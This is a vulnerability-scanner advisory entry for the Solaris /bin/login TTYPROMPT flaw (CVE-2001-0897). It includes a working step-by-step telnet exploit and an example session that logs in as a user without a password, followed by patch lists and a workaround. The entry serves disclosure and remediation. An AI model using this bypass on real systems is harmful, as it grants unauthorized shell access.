| VID |
14029 |
| Severity |
40 |
| Port |
23 |
| Protocol |
TCP |
| Class |
TELNET |
| Detailed Description |
Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. The vulnerability allows for a remote attacker without valid credentials to gain local access as any user, including root if remote root logins are permitted.
This vulnerability has already been reported to BugTraq mailing list and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be
compiled by an attacker, exists.
The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. Once connected to the remote host, you must type the username, followed by 64 'c's, and a literal '\n'. You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).
Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c (continue)
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin
Platforms Affected:
Sun Solaris 2.5.1
Sun Solaris 2.6
Sun Solaris 7.0
Sun Solaris 8.0
* References:
http://www.iss.net/security_center/static/7284.php |
| Recommendation |
Apply the appropriate patch for your system, as listed in Sun SunSolve Security Patches Web site,
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F41987
SPARC:
Solaris 2.5.1: patch 106160-02 or later
Solaris 2.6: patch 105665-04 or later
Solaris 7: patch 112300-01 or later
Solaris 8: patch 111085-02 or later
Intel:
Solaris 2.5.1: patch 106161-02 or later
Solaris 2.6: patch 105666-04 or later
Solaris 7: patch 112301-01 or later
Solaris 8: patch 111086-02 or later
Use patchadd command to patch. A reboot is not necessary.
As a workaround, disable the telnet server through which /bin/login may be exploited remotely. To do this, comment the associated entry out in the file /etc/inetd.conf. Then restart inetd. |
| Related URL |
CVE-2001-0897 (CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
(ISS) |
|
